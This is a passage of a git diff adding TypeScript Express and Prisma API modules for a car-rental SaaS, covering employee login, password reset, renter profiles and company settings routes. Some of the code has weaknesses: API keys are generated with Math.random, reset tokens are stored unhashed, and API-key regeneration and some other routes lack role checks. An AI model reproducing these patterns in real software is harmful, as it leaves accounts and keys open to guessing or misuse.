lastName: body.lastName, + passwordHash, + now, + trialEndAt, + })) + + const lang = body.preferredLanguage as Lang + const emailResult = await sendNotification({ + type: 'SUBSCRIPTION_TRIAL_ENDING', + title: signupEmail.subject(lang), + body: signupEmail.text({ + firstName: body.firstName, + companyName: body.companyName, + plan: body.plan, + billingPeriod: body.billingPeriod, + currency: body.currency, + paymentProvider: body.paymentProvider, + trialEnd: trialEndAt, + }, lang), + companyId: result.company.id, + employeeId: result.employee.id, + email: body.email, + channels: ['EMAIL', 'IN_APP'], + locale: lang, + }).catch(() => []) + + const emailDelivery = (emailResult as Array<{ channel?: string }>).find((entry) => entry.channel === 'EMAIL') + + return presentCompanySignup({ + company: result.company, + trialEndAt, + emailDelivery, + }) +} + +export function completeSignupDisabled() { + throw new AppError('Clerk-based signup has been removed. Use /auth/company/signup instead.', 410, 'disabled') +} + +export function verifyEmailDisabled() { + throw new AppError('Email verification resend via Clerk has been removed from this project.', 410, 'disabled') +} diff --git a/apps/api/src/modules/auth/auth.employee.repo.ts b/apps/api/src/modules/auth/auth.employee.repo.ts new file mode 100644 index 0000000..fba6b6a --- /dev/null +++ b/apps/api/src/modules/auth/auth.employee.repo.ts @@ -0,0 +1,55 @@ +import { prisma } from '../../lib/prisma' + +export function findEmployeeWithCompanyById(id: string) { + return prisma.employee.findUnique({ + where: { id }, + include: { company: true }, + }) +} + +export function findEmployeeWithCompanyByEmail(email: string) { + return prisma.employee.findFirst({ + where: { email }, + include: { company: true }, + }) +} + +export function findActiveEmployeeByEmail(email: string) { + return prisma.employee.findFirst({ + where: { email, isActive: true }, + }) +} + +export function setPasswordResetToken(id: string, passwordResetToken: string, passwordResetExpiresAt: Date) { + return prisma.employee.update({ + where: { id }, + data: { passwordResetToken, passwordResetExpiresAt }, + }) +} + +export function updatePreferredLanguage(id: string, preferredLanguage: 'en' | 'fr' | 'ar') { + return prisma.employee.update({ + where: { id }, + data: { preferredLanguage }, + }) +} + +export function findEmployeeByResetToken(token: string) { + return prisma.employee.findFirst({ + where: { + passwordResetToken: token, + passwordResetExpiresAt: { gt: new Date() }, + }, + }) +} + +export function resetPassword(id: string, passwordHash: string) { + return prisma.employee.update({ + where: { id }, + data: { + passwordHash, + passwordResetToken: null, + passwordResetExpiresAt: null, + }, + }) +} diff --git a/apps/api/src/modules/auth/auth.employee.routes.ts b/apps/api/src/modules/auth/auth.employee.routes.ts new file mode 100644 index 0000000..5cdaf02 --- /dev/null +++ b/apps/api/src/modules/auth/auth.employee.routes.ts @@ -0,0 +1,49 @@ +import { Router } from 'express' +import { requireCompanyAuth } from '../../middleware/requireCompanyAuth' +import { parseBody } from '../../http/validate' +import { ok } from '../../http/respond' +import { + employeeForgotPasswordSchema, + employeeLanguageSchema, + employeeLoginSchema, + employeeResetPasswordSchema, +} from './auth.employee.schemas' +import * as service from './auth.employee.service' + +const router = Router() + +router.get('/me', requireCompanyAuth, async (req, res, next) => { + try { + ok(res, await service.getMe(req.employee.id)) + } catch (err) { next(err) } +}) + +router.post('/login', async (req, res, next) => { + try { + const body = parseBody(employeeLoginSchema, req) + ok(res, await service.login(body)) + } catch (err) { next(err) } +}) + +router.post('/forgot-password', async (req, res, next) => { + try { + const { email } = parseBody(employeeForgotPasswordSchema, req) + ok(res, await service.forgotPassword(email)) + } catch (err) { next(err) } +}) + +router.patch('/me/language', requireCompanyAuth, async (req, res, next) => { + try { + const { language } = parseBody(employeeLanguageSchema, req) + ok(res, await service.updateLanguage(req.employee.id, language)) + } catch (err) { next(err) } +}) + +router.post('/reset-password', async (req, res, next) => { + try { + const { token, password } = parseBody(employeeResetPasswordSchema, req) + ok(res, await service.resetPassword(token, password)) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/auth/auth.employee.schemas.ts b/apps/api/src/modules/auth/auth.employee.schemas.ts new file mode 100644 index 0000000..602e7de --- /dev/null +++ b/apps/api/src/modules/auth/auth.employee.schemas.ts @@ -0,0 +1,19 @@ +import { z } from 'zod' + +export const employeeLoginSchema = z.object({ + email: z.string().email().max(255).trim().toLowerCase(), + password: z.string().max(128), +}) + +export const employeeForgotPasswordSchema = z.object({ + email: z.string().email().max(255).trim().toLowerCase(), +}) + +export const employeeLanguageSchema = z.object({ + language: z.enum(['en', 'fr', 'ar']), +}) + +export const employeeResetPasswordSchema = z.object({ + token: z.string().min(1), + password: z.string().min(8).max(128), +}) diff --git a/apps/api/src/modules/auth/auth.employee.service.ts b/apps/api/src/modules/auth/auth.employee.service.ts new file mode 100644 index 0000000..67c9f2a --- /dev/null +++ b/apps/api/src/modules/auth/auth.employee.service.ts @@ -0,0 +1,105 @@ +import bcrypt from 'bcryptjs' +import crypto from 'crypto' +import jwt from 'jsonwebtoken' +import { AppError } from '../../http/errors' +import { sendTransactionalEmail } from '../../services/notificationService' +import { resetPasswordEmail, type Lang } from '../../lib/emailTranslations' +import { presentEmployeeSession } from './auth.presenter' +import * as repo from './auth.employee.repo' +import { employeeLanguageSchema, employeeLoginSchema } from './auth.employee.schemas' +import type { output } from 'zod' + +const RESET_TOKEN_TTL_MINUTES = 60 + +type EmployeeLoginInput = output +type EmployeeLanguageInput = output + +function signEmployeeToken(employeeId: string) { + return jwt.sign( + { sub: employeeId, type: 'employee' }, + process.env.JWT_SECRET!, + { expiresIn: (process.env.JWT_EXPIRY ?? '8h') as jwt.SignOptions['expiresIn'] }, + ) +} + +function ensureDashboardBasePath(baseUrl: string) { + try { + const url = new URL(baseUrl) + const pathname = url.pathname.replace(/\/$/, '') + if (!pathname.endsWith('/dashboard')) url.pathname = `${pathname}/dashboard` + return url.toString().replace(/\/$/, '') + } catch { + const trimmed = baseUrl.replace(/\/$/, '') + return trimmed.endsWith('/dashboard') ? trimmed : `${trimmed}/dashboard` + } +} + +export async function getMe(employeeId: string) { + const employee = await repo.findEmployeeWithCompanyById(employeeId) + + if (!employee || !employee.isActive) { + throw new AppError('Employee account not found or inactive', 401, 'unauthenticated') + } + + return presentEmployeeSession(employee) +} + +export async function login(body: EmployeeLoginInput) { + const employee = await repo.findEmployeeWithCompanyByEmail(body.email) + + if (!employee || !employee.isActive) { + throw new AppError('Invalid email or password', 401, 'invalid_credentials') + } + + if (!employee.passwordHash) { + throw new AppError('This account does not have a password yet. Use the invitation or reset email to set one first.', 401, 'password_not_set') + } + + const validPassword = await bcrypt.compare(body.password, employee.passwordHash) + if (!validPassword) { + throw new AppError('Invalid email or password', 401, 'invalid_credentials') + } + + return presentEmployeeSession(employee, signEmployeeToken(employee.id)) +} + +export async function forgotPassword(email: string) { + const employee = await repo.findActiveEmployeeByEmail(email) + + if (employee) { + const rawToken = crypto.randomBytes(32).toString('hex') + const expiresAt = new Date(Date.now() + RESET_TOKEN_TTL_MINUTES * 60 * 1000) + await repo.setPasswordResetToken(employee.id, rawToken, expiresAt) + + const dashboardUrl = ensureDashboardBasePath( + process.env.DASHBOARD_URL ?? process.env.NEXT_PUBLIC_DASHBOARD_URL ?? 'http://localhost:3001/dashboard', + ) + const resetUrl = `${dashboardUrl}/reset-password?token=${rawToken}` + const lang = (employee.preferredLanguage as Lang) ?? 'fr' + + await sendTransactionalEmail({ + to: email, + subject: resetPasswordEmail.subject(lang), + html: resetPasswordEmail.html(resetUrl, employee.firstName, RESET_TOKEN_TTL_MINUTES, lang), + text: resetPasswordEmail.text(resetUrl, employee.firstName, RESET_TOKEN_TTL_MINUTES, lang), + }).catch((err) => console.error('[ForgotPassword]', err?.message)) + } + + return { message: 'If that email is registered, a reset link has been sent.' } +} + +export async function updateLanguage(employeeId: string, language: EmployeeLanguageInput['language']) { + await repo.updatePreferredLanguage(employeeId, language) + return { language } +} + +export async function resetPassword(token: string, password: string) { + const employee = await repo.findEmployeeByResetToken(token) + + if (!employee) { + throw new AppError('Reset link is invalid or has expired.', 400, 'invalid_token') + } + + await repo.resetPassword(employee.id, await bcrypt.hash(password, 12)) + return { message: 'Password updated successfully. You can now sign in.' } +} diff --git a/apps/api/src/modules/auth/auth.presenter.ts b/apps/api/src/modules/auth/auth.presenter.ts new file mode 100644 index 0000000..b630ccc --- /dev/null +++ b/apps/api/src/modules/auth/auth.presenter.ts @@ -0,0 +1,86 @@ +type EmployeeWithCompany = { + id: string + email: string + firstName: string + lastName: string + role: string + preferredLanguage?: string | null + companyId: string + company: { + name: string + slug: string + } +} + +type CompanySignupResult = { + company: { + id: string + name: string + slug: string + } + trialEndAt: Date + emailDelivery?: unknown +} + +type RenterProfile = { + id: string + firstName: string + lastName: string + email: string + phone: string | null + preferredLocale: string | null + preferredCurrency: string | null + emailVerified: boolean + savedCompanies: Array<{ companyId: string }> +} + +type SavedCompany = { + id: string + brand: { + displayName: string | null + subdomain: string | null + logoUrl: string | null + } | null +} + +export function presentEmployeeSession(employee: EmployeeWithCompany, token?: string) { + const data = { + employee: { + id: employee.id, + email: employee.email, + firstName: employee.firstName, + lastName: employee.lastName, + role: employee.role, + preferredLanguage: employee.preferredLanguage, + companyId: employee.companyId, + companyName: employee.company.name, + companySlug: employee.company.slug, + }, + } + + return token ? { token, ...data } : data +} + +export function presentCompanySignup(result: CompanySignupResult) { + return { + companyId: result.company.id, + companyName: result.company.name, + slug: result.company.slug, + invitationId: null, + trialEndsAt: result.trialEndAt.toISOString(), + nextStep: 'workspace_created', + emailDelivery: result.emailDelivery ?? { attempted: false, success: false, error: null }, + } +} + +export function presentRenterProfile(renter: RenterProfile, companies: SavedCompany[]) { + const companyMap = new Map(companies.map((company) => [company.id, company])) + + return { + ...renter, + savedCompanies: renter.savedCompanies.map((savedCompany) => ({ + id: savedCompany.companyId, + brand: companyMap.get(savedCompany.companyId)?.brand ?? null, + })), + } +} diff --git a/apps/api/src/modules/auth/auth.renter.repo.ts b/apps/api/src/modules/auth/auth.renter.repo.ts new file mode 100644 index 0000000..acda579 --- /dev/null +++ b/apps/api/src/modules/auth/auth.renter.repo.ts @@ -0,0 +1,50 @@ +import { prisma } from '../../lib/prisma' +import type { output } from 'zod' +import { renterUpdateSchema } from './auth.renter.schemas' + +type RenterUpdateInput = output + +export function findRenterProfile(id: string) { + return prisma.renter.findUniqueOrThrow({ + where: { id }, + select: { + id: true, + firstName: true, + lastName: true, + email: true, + phone: true, + preferredLocale: true, + preferredCurrency: true, + emailVerified: true, + savedCompanies: { select: { companyId: true } }, + }, + }) +} + +export function findSavedCompanies(companyIds: string[]) { + return companyIds.length === 0 + ? Promise.resolve([]) + : prisma.company.findMany({ + where: { id: { in: companyIds } }, + select: { + id: true, + brand: { + select: { displayName: true, subdomain: true, logoUrl: true }, + }, + }, + }) +} + +export function updateRenterProfile(id: string, data: RenterUpdateInput) { + return prisma.renter.update({ + where: { id }, + data, + }) +} + +export function updateRenterFcmToken(id: string, fcmToken: string) { + return prisma.renter.update({ + where: { id }, + data: { fcmToken }, + }) +} diff --git a/apps/api/src/modules/auth/auth.renter.routes.ts b/apps/api/src/modules/auth/auth.renter.routes.ts new file mode 100644 index 0000000..72607ef --- /dev/null +++ b/apps/api/src/modules/auth/auth.renter.routes.ts @@ -0,0 +1,40 @@ +import { Router } from 'express' +import { requireRenterAuth } from '../../middleware/requireRenterAuth' +import { parseBody } from '../../http/validate' +import { ok } from '../../http/respond' +import { renterFcmTokenSchema, renterUpdateSchema } from './auth.renter.schemas' +import * as service from './auth.renter.service' + +const router = Router() + +router.post('/signup', (_req, res) => { + service.signupDisabled() + res.end() +}) + +router.post('/login', (_req, res) => { + service.loginDisabled() + res.end() +}) + +router.get('/me', requireRenterAuth, async (req, res, next) => { + try { + ok(res, await service.getMe(req.renterId)) + } catch (err) { next(err) } +}) + +router.patch('/me', requireRenterAuth, async (req, res, next) => { + try { + const body = parseBody(renterUpdateSchema, req) + ok(res, await service.updateMe(req.renterId, body)) + } catch (err) { next(err) } +}) + +router.post('/me/fcm-token', requireRenterAuth, async (req, res, next) => { + try { + const { fcmToken } = parseBody(renterFcmTokenSchema, req) + ok(res, await service.updateFcmToken(req.renterId, fcmToken)) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/auth/auth.renter.schemas.ts b/apps/api/src/modules/auth/auth.renter.schemas.ts new file mode 100644 index 0000000..bf4ac08 --- /dev/null +++ b/apps/api/src/modules/auth/auth.renter.schemas.ts @@ -0,0 +1,13 @@ +import { z } from 'zod' + +export const renterUpdateSchema = z.object({ + firstName: z.string().min(1).max(100).trim().optional(), + lastName: z.string().min(1).max(100).trim().optional(), + phone: z.string().max(30).trim().optional(), + preferredLocale: z.enum(['en', 'fr', 'ar']).optional(), + preferredCurrency: z.enum(['MAD', 'USD', 'EUR']).optional(), +}) + +export const renterFcmTokenSchema = z.object({ + fcmToken: z.string(), +}) diff --git a/apps/api/src/modules/auth/auth.renter.service.ts b/apps/api/src/modules/auth/auth.renter.service.ts new file mode 100644 index 0000000..a84c618 --- /dev/null +++ b/apps/api/src/modules/auth/auth.renter.service.ts @@ -0,0 +1,30 @@ +import { AppError } from '../../http/errors' +import { presentRenterProfile } from './auth.presenter' +import * as repo from './auth.renter.repo' +import type { output } from 'zod' +import { renterUpdateSchema } from './auth.renter.schemas' + +type RenterUpdateInput = output + +export function signupDisabled() { + throw new AppError('Renter account creation is disabled. Only company owners can sign in to the platform.', 403, 'renter_signup_disabled') +} + +export function loginDisabled() { + throw new AppError('Renter sign-in is disabled. Only company owners can sign in to the platform.', 403, 'renter_login_disabled') +} + +export async function getMe(renterId: string) { + const renter = await repo.findRenterProfile(renterId) + const savedCompanies = await repo.findSavedCompanies(renter.savedCompanies.map((savedCompany) => savedCompany.companyId)) + return presentRenterProfile(renter, savedCompanies) +} + +export function updateMe(renterId: string, body: RenterUpdateInput) { + return repo.updateRenterProfile(renterId, body) +} + +export async function updateFcmToken(renterId: string, fcmToken: string) { + await repo.updateRenterFcmToken(renterId, fcmToken) + return { success: true } +} diff --git a/apps/api/src/modules/companies/company.presenter.ts b/apps/api/src/modules/companies/company.presenter.ts new file mode 100644 index 0000000..54f0ddc --- /dev/null +++ b/apps/api/src/modules/companies/company.presenter.ts @@ -0,0 +1,7 @@ +export function presentCompany(company: any) { + return company +} + +export function presentBrand(brand: any) { + return brand +} diff --git a/apps/api/src/modules/companies/company.repo.ts b/apps/api/src/modules/companies/company.repo.ts new file mode 100644 index 0000000..a67959c --- /dev/null +++ b/apps/api/src/modules/companies/company.repo.ts @@ -0,0 +1,125 @@ +import { prisma } from '../../lib/prisma' + +export async function findCompany(companyId: string) { + return prisma.company.findUniqueOrThrow({ + where: { id: companyId }, + include: { + brand: true, + subscription: true, + _count: { select: { vehicles: true, customers: true, reservations: true } }, + }, + }) +} + +export async function updateCompany(companyId: string, data: any) { + return prisma.company.update({ where: { id: companyId }, data }) +} + +export async function findBrand(companyId: string) { + return prisma.brandSettings.findUnique({ where: { companyId } }) +} + +export async function upsertBrand(companyId: string, updateData: any, createData: any) { + return prisma.brandSettings.upsert({ + where: { companyId }, + update: updateData, + create: { companyId, ...createData }, + }) +} + +export async function findContractSettings(companyId: string) { + return prisma.contractSettings.findUnique({ where: { companyId } }) +} + +export async function upsertContractSettings(companyId: string, data: any) { + return prisma.contractSettings.upsert({ + where: { companyId }, + update: data, + create: { companyId, ...data }, + }) +} + +export async function findInsurancePolicies(companyId: string) { + return prisma.insurancePolicy.findMany({ + where: { companyId }, + orderBy: [{ isRequired: 'desc' }, { sortOrder: 'asc' }, { name: 'asc' }], + }) +} + +export async function createInsurancePolicy(companyId: string, data: any) { + return prisma.insurancePolicy.create({ data: { companyId, ...data } }) +} + +export async function updateInsurancePolicy(id: string, companyId: string, data: any) { + return prisma.insurancePolicy.updateMany({ where: { id, companyId }, data }) +} + +export async function findInsurancePolicyOrThrow(id: string) { + return prisma.insurancePolicy.findUniqueOrThrow({ where: { id } }) +} + +export async function deleteInsurancePolicy(id: string, companyId: string) { + return prisma.insurancePolicy.deleteMany({ where: { id, companyId } }) +} + +export async function findPricingRules(companyId: string) { + return prisma.pricingRule.findMany({ + where: { companyId }, + orderBy: [{ isActive: 'desc' }, { createdAt: 'asc' }], + }) +} + +export async function createPricingRule(companyId: string, data: any) { + return prisma.pricingRule.create({ data: { companyId, ...data } }) +} + +export async function updatePricingRule(id: string, companyId: string, data: any) { + return prisma.pricingRule.updateMany({ where: { id, companyId }, data }) +} + +export async function findPricingRuleOrThrow(id: string) { + return prisma.pricingRule.findUniqueOrThrow({ where: { id } }) +} + +export async function deletePricingRule(id: string, companyId: string) { + return prisma.pricingRule.deleteMany({ where: { id, companyId } }) +} + +export async function findAccountingSettings(companyId: string) { + return prisma.accountingSettings.findUnique({ where: { companyId } }) +} + +export async function upsertAccountingSettings(companyId: string, data: any) { + return prisma.accountingSettings.upsert({ + where: { companyId }, + update: data, + create: { companyId, ...data }, + }) +} + +export async function findApiKey(companyId: string) { + return prisma.company.findUniqueOrThrow({ where: { id: companyId }, select: { apiKey: true } }) +} + +export async function regenerateApiKey(companyId: string) { + return prisma.company.update({ + where: { id: companyId }, + data: { apiKey: `api_${Math.random().toString(36).slice(2)}${Date.now()}` }, + select: { apiKey: true }, + }) +} + +export async function findBrandBySubdomain(subdomain: string, excludeCompanyId: string) { + return prisma.brandSettings.findFirst({ where: { subdomain, companyId: { not: excludeCompanyId } } }) +} + +export async function findBrandByCustomDomain(customDomain: string, excludeCompanyId: string) { + return prisma.brandSettings.findFirst({ where: { customDomain, companyId: { not: excludeCompanyId } } }) +} + +export async function clearCustomDomain(companyId: string) { + return prisma.brandSettings.updateMany({ + where: { companyId }, + data: { customDomain: null, customDomainVerified: false, customDomainAddedAt: null }, + }) +} diff --git a/apps/api/src/modules/companies/company.routes.ts b/apps/api/src/modules/companies/company.routes.ts new file mode 100644 index 0000000..a15c564 --- /dev/null +++ b/apps/api/src/modules/companies/company.routes.ts @@ -0,0 +1,204 @@ +import { Router } from 'express' +import { requireCompanyAuth } from '../../middleware/requireCompanyAuth' +import { requireTenant } from '../../middleware/requireTenant' +import { requireSubscription } from '../../middleware/requireSubscription' +import { requireRole } from '../../middleware/requireRole' +import { parseBody, parseParams } from '../../http/validate' +import { ok, created, noContent } from '../../http/respond' +import { imageUpload, assertImageFile } from '../../http/upload' +import * as service from './company.service' +import { + companySchema, brandSchema, contractSettingsSchema, + insurancePolicySchema, pricingRuleSchema, accountingSettingsSchema, + subdomainSchema, customDomainSchema, idParamSchema, +} from './company.schemas' + +const router = Router() + +router.use(requireCompanyAuth, requireTenant, requireSubscription) + +router.get('/me', async (req, res, next) => { + try { + const company = await service.getCompany(req.companyId) + ok(res, company) + } catch (err) { next(err) } +}) + +router.patch('/me', requireRole('OWNER'), async (req, res, next) => { + try { + const body = parseBody(companySchema, req) + const company = await service.updateCompany(req.companyId, body) + ok(res, company) + } catch (err) { next(err) } +}) + +router.get('/me/brand', async (req, res, next) => { + try { + const brand = await service.getBrand(req.companyId) + ok(res, brand) + } catch (err) { next(err) } +}) + +router.patch('/me/brand', requireRole('OWNER'), async (req, res, next) => { + try { + const body = parseBody(brandSchema, req) + const brand = await service.updateBrand(req.companyId, body, req.company.name, req.company.slug) + ok(res, brand) + } catch (err) { next(err) } +}) + +router.post('/me/brand/logo', requireRole('OWNER'), imageUpload.single('file'), async (req, res, next) => { + try { + assertImageFile(req.file, 'logo') + const brand = await service.uploadLogo(req.companyId, req.company.name, req.company.slug, req.file.buffer) + ok(res, brand) + } catch (err) { next(err) } +}) + +router.post('/me/brand/hero', requireRole('OWNER'), imageUpload.single('file'), async (req, res, next) => { + try { + assertImageFile(req.file, 'hero image') + const brand = await service.uploadHeroImage(req.companyId, req.company.name, req.company.slug, req.file.buffer) + ok(res, brand) + } catch (err) { next(err) } +}) + +router.post('/me/brand/subdomain/check', requireRole('OWNER'), async (req, res, next) => { + try { + const { subdomain } = parseBody(subdomainSchema, req) + const result = await service.checkSubdomainAvailability(subdomain, req.companyId) + ok(res, result) + } catch (err) { next(err) } +}) + +router.post('/me/brand/custom-domain', requireRole('OWNER'), async (req, res, next) => { + try { + const { customDomain } = parseBody(customDomainSchema, req) + const brand = await service.setCustomDomain(req.companyId, req.company.name, req.company.slug, customDomain) + ok(res, brand) + } catch (err) { next(err) } +}) + +router.get('/me/brand/custom-domain/status', async (req, res, next) => { + try { + const status = await service.getCustomDomainStatus(req.companyId) + ok(res, status) + } catch (err) { next(err) } +}) + +router.delete('/me/brand/custom-domain', requireRole('OWNER'), async (req, res, next) => { + try { + const result = await service.removeCustomDomain(req.companyId) + ok(res, result) + } catch (err) { next(err) } +}) + +router.get('/me/contract-settings', async (req, res, next) => { + try { + const settings = await service.getContractSettings(req.companyId) + ok(res, settings) + } catch (err) { next(err) } +}) + +router.patch('/me/contract-settings', requireRole('MANAGER'), async (req, res, next) => { + try { + const body = parseBody(contractSettingsSchema, req) + const settings = await service.updateContractSettings(req.companyId, body) + ok(res, settings) + } catch (err) { next(err) } +}) + +router.get('/me/insurance-policies', async (req, res, next) => { + try { + const policies = await service.getInsurancePolicies(req.companyId) + ok(res, policies) + } catch (err) { next(err) } +}) + +router.post('/me/insurance-policies', requireRole('MANAGER'), async (req, res, next) => { + try { + const body = parseBody(insurancePolicySchema, req) + const policy = await service.createInsurancePolicy(req.companyId, body) + created(res, policy) + } catch (err) { next(err) } +}) + +router.patch('/me/insurance-policies/:id', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const body = parseBody(insurancePolicySchema.partial(), req) + const policy = await service.updateInsurancePolicy(id, req.companyId, body) + ok(res, policy) + } catch (err) { next(err) } +}) + +router.delete('/me/insurance-policies/:id', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + await service.deleteInsurancePolicy(id, req.companyId) + ok(res, { success: true }) + } catch (err) { next(err) } +}) + +router.get('/me/pricing-rules', async (req, res, next) => { + try { + const rules = await service.getPricingRules(req.companyId) + ok(res, rules) + } catch (err) { next(err) } +}) + +router.post('/me/pricing-rules', requireRole('MANAGER'), async (req, res, next) => { + try { + const body = parseBody(pricingRuleSchema, req) + const rule = await service.createPricingRule(req.companyId, body) + created(res, rule) + } catch (err) { next(err) } +}) + +router.patch('/me/pricing-rules/:id', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const body = parseBody(pricingRuleSchema.partial(), req) + const rule = await service.updatePricingRule(id, req.companyId, body) + ok(res, rule) + } catch (err) { next(err) } +}) + +router.delete('/me/pricing-rules/:id', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + await service.deletePricingRule(id, req.companyId) + ok(res, { success: true }) + } catch (err) { next(err) } +}) + +router.get('/me/accounting-settings', async (req, res, next) => { + try { + const settings = await service.getAccountingSettings(req.companyId) + ok(res, settings) + } catch (err) { next(err) } +}) + +router.patch('/me/accounting-settings', async (req, res, next) => { + try { + const body = parseBody(accountingSettingsSchema, req) + const settings = await service.updateAccountingSettings(req.companyId, body) + ok(res, settings) + } catch (err) { next(err) } +}) + +router.get('/me/api-key', async (req, res, next) => { + try { + const company = await service.getApiKey(req.companyId) + ok(res, company) + } catch (err) { next(err) } +}) + +router.post('/me/api-key/regenerate', async (req, res, next) => { + try { + const company = await service.regenerateApiKey(req.companyId) + ok(res, company) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/companies/company.schemas.ts b/apps/api/src/modules/companies/company.schemas.ts new file mode 100644 index 0000000..5858cfd --- /dev/null +++ b/apps/api/src/modules/companies/company.schemas.ts @@ -0,0 +1,158 @@ +import { z } from 'zod' + +export const companySchema = z.object({ + name: z.string().min(1).optional(), + email: z.string().email().optional(), + phone: z.string().optional(), + address: z.record(z.unknown()).optional(), +}) + +export const brandSchema = z.object({ + displayName: z.string().min(1).optional(), + tagline: z.string().optional(), + primaryColor: z.string().optional(), + accentColor: z.string().optional(), + publicEmail: z.string().email().optional(), + publicPhone: z.string().optional(), + publicAddress: z.string().optional(), + publicCity: z.string().optional(), + publicCountry: z.string().optional(), + websiteUrl: z.string().url().optional(), + whatsappNumber: z.string().optional(), + defaultLocale: z.string().optional(), + defaultCurrency: z.enum(['MAD', 'USD', 'EUR']).optional(), + amanpayMerchantId: z.string().optional(), + amanpaySecretKey: z.string().optional(), + paypalEmail: z.string().email().optional(), + paypalMerchantId: z.string().optional(), + isListedOnMarketplace: z.boolean().optional(), + homePageConfig: z.object({ + heroTitle: z.union([z.string(), z.null()]).optional(), + heroDescription: z.union([z.string(), z.null()]).optional(), + viewOffersLabel: z.union([z.string(), z.null()]).optional(), + viewPricingLabel: z.union([z.string(), z.null()]).optional(), + contactCompanyLabel: z.union([z.string(), z.null()]).optional(), + activeOffersTitle: z.union([z.string(), z.null()]).optional(), + seeAllOffersLabel: z.union([z.string(), z.null()]).optional(), + noActiveOffersLabel: z.union([z.string(), z.null()]).optional(), + publishedVehiclesTitle: z.union([z.string(), z.null()]).optional(), + viewVehicleLabel: z.union([z.string(), z.null()]).optional(), + pricingEyebrow: z.union([z.string(), z.null()]).optional(), + pricingTitle: z.union([z.string(), z.null()]).optional(), + pricingDescription: z.union([z.string(), z.null()]).optional(), + showOffers: z.boolean().optional(), + showVehicles: z.boolean().optional(), + showPricing: z.boolean().optional(), + layout: z.object({ + items: z.array(z.object({ + id: z.string().min(1), + type: z.enum(['hero', 'offers', 'vehicles', 'pricing']), + x: z.number().int().min(1), + y: z.number().int().min(1), + w: z.number().int().min(1), + h: z.number().int().min(1), + })), + }).optional(), + }).optional(), + menuConfig: z.object({ + aboutLabel: z.union([z.string(), z.null()]).optional(), + vehiclesLabel: z.union([z.string(), z.null()]).optional(), + offersLabel: z.union([z.string(), z.null()]).optional(), + pricingLabel: z.union([z.string(), z.null()]).optional(), + blogLabel: z.union([z.string(), z.null()]).optional(), + contactLabel: z.union([z.string(), z.null()]).optional(), + bookCarLabel: z.union([z.string(), z.null()]).optional(), + siteNavigationLabel: z.union([z.string(), z.null()]).optional(), + showAbout: z.boolean().optional(), + showVehicles: z.boolean().optional(), + showOffers: z.boolean().optional(), + showPricing: z.boolean().optional(), + showBlog: z.boolean().optional(), + showContact: z.boolean().optional(), + pageSections: z.object({ + home: z.object({ + hero: z.boolean().optional(), offers: z.boolean().optional(), + vehicles: z.boolean().optional(), pricing: z.boolean().optional(), + }).optional(), + about: z.object({ + hero: z.boolean().optional(), highlights: z.boolean().optional(), details: z.boolean().optional(), + }).optional(), + offers: z.object({ header: z.boolean().optional(), grid: z.boolean().optional() }).optional(), + pricing: z.object({ + hero: z.boolean().optional(), plans: z.boolean().optional(), + payments: z.boolean().optional(), faq: z.boolean().optional(), + }).optional(), + vehicles: z.object({ + header: z.boolean().optional(), filters: z.boolean().optional(), grid: z.boolean().optional(), + }).optional(), + vehicleDetail: z.object({ gallery: z.boolean().optional(), summary: z.boolean().optional() }).optional(), + blog: z.object({ hero: z.boolean().optional(), posts: z.boolean().optional() }).optional(), + contact: z.object({ content: z.boolean().optional() }).optional(), + booking: z.object({ content: z.boolean().optional() }).optional(), + bookingConfirmation: z.object({ + hero: z.boolean().optional(), summary: z.boolean().optional(), actions: z.boolean().optional(), + }).optional(), + }).optional(), + }).optional(), +}) + +export const contractSettingsSchema = z.object({ + legalName: z.string().optional(), + registrationNumber: z.string().optional(), + taxId: z.string().optional(), + terms: z.string().optional(), + fuelPolicy: z.string().optional(), + depositPolicy: z.string().optional(), + lateFeePolicy: z.string().optional(), + damagePolicy: z.string().optional(), + contractFooterNote: z.string().optional(), + invoiceFooterNote: z.string().optional(), + signatureRequired: z.boolean().optional(), + showTax: z.boolean().optional(), + taxRate: z.number().optional(), + taxLabel: z.string().optional(), + fuelPolicyType: z.enum(['FULL_TO_FULL', 'FULL_TO_EMPTY', 'SAME_TO_SAME', 'PREPAID', 'FREE']).optional(), + fuelPolicyNote: z.string().optional(), + fuelChargePerLiter: z.number().int().optional(), + fuelShortfallFee: z.number().int().optional(), + lateFeePerHour: z.number().int().optional(), + additionalDriverCharge: z.enum(['FREE', 'PER_DAY', 'FLAT']).optional(), + additionalDriverDailyRate: z.number().int().optional(), + additionalDriverFlatRate: z.number().int().optional(), +}) + +export const insurancePolicySchema = z.object({ + name: z.string().min(1), + description: z.string().optional(), + type: z.enum(['CDW', 'SCDW', 'THEFT', 'THIRD_PARTY', 'FULL', 'BASIC', 'ROADSIDE', 'PERSONAL', 'CUSTOM']), + chargeType: z.enum(['PER_DAY', 'PER_RENTAL', 'PERCENTAGE_OF_RENTAL']), + chargeValue: z.number().int().min(0), + isRequired: z.boolean().default(false), + isActive: z.boolean().default(true), + sortOrder: z.number().int().default(0), +}) + +export const pricingRuleSchema = z.object({ + name: z.string().min(1), + type: z.enum(['SURCHARGE', 'DISCOUNT']), + condition: z.enum(['AGE_LESS_THAN', 'AGE_GREATER_THAN', 'LICENSE_YEARS_LESS_THAN', 'LICENSE_YEARS_GREATER_THAN']), + conditionValue: z.number().int(), + adjustmentType: z.enum(['PERCENTAGE', 'FLAT_PER_DAY', 'FLAT_TOTAL']), + adjustmentValue: z.number().int(), + isActive: z.boolean().default(true), + description: z.string().optional(), +}) + +export const accountingSettingsSchema = z.object({ + reportingPeriod: z.enum(['WEEKLY', 'MONTHLY', 'QUARTERLY', 'ANNUAL']).optional(), + fiscalYearStart: z.number().int().min(1).max(12).optional(), + currency: z.enum(['MAD', 'USD', 'EUR']).optional(), + accountantEmail: z.string().email().optional(), + accountantName: z.string().optional(), + autoSendReport: z.boolean().optional(), + reportFormat: z.enum(['PDF', 'CSV', 'BOTH']).optional(), +}) + +export const subdomainSchema = z.object({ subdomain: z.string().min(3) }) +export const customDomainSchema = z.object({ customDomain: z.string().min(3) }) +export const idParamSchema = z.object({ id: z.string() }) diff --git a/apps/api/src/modules/companies/company.service.ts 